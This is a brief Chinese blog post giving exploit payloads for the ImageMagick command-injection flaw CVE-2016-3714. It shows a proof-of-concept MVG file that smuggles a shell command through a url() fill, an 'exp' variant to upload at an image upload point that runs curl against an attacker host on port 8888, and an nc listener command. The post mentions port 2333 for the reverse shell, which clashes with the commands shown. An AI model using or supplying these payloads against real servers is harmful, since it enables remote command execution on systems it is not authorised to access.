漏洞简介:/etc/ImageMagick/delegates.xml 将%s,%l加入到command里造成了命令执行

利用方式:

poc代码:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://"| command")'
pop graphic-context

  

图片上传点,抓包,附上exp代码:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://"| curl 172.16.20.108:8888")'
pop graphic-context

 

ip:你要反弹的shell地址,2333端口号,服务器监听反弹shell。

nc -lvp 8888

CVE-2016-3714-ImageMagick 漏洞利用

 

相关文章:

  • 2022-02-28
  • 2022-01-24
  • 2022-02-21
  • 2021-11-08
  • 2021-11-02
  • 2021-07-28
猜你喜欢
  • 2022-12-23
  • 2021-09-15
  • 2021-11-15
  • 2022-12-23
  • 2021-06-01
  • 2021-11-13
相关资源
相似解决方案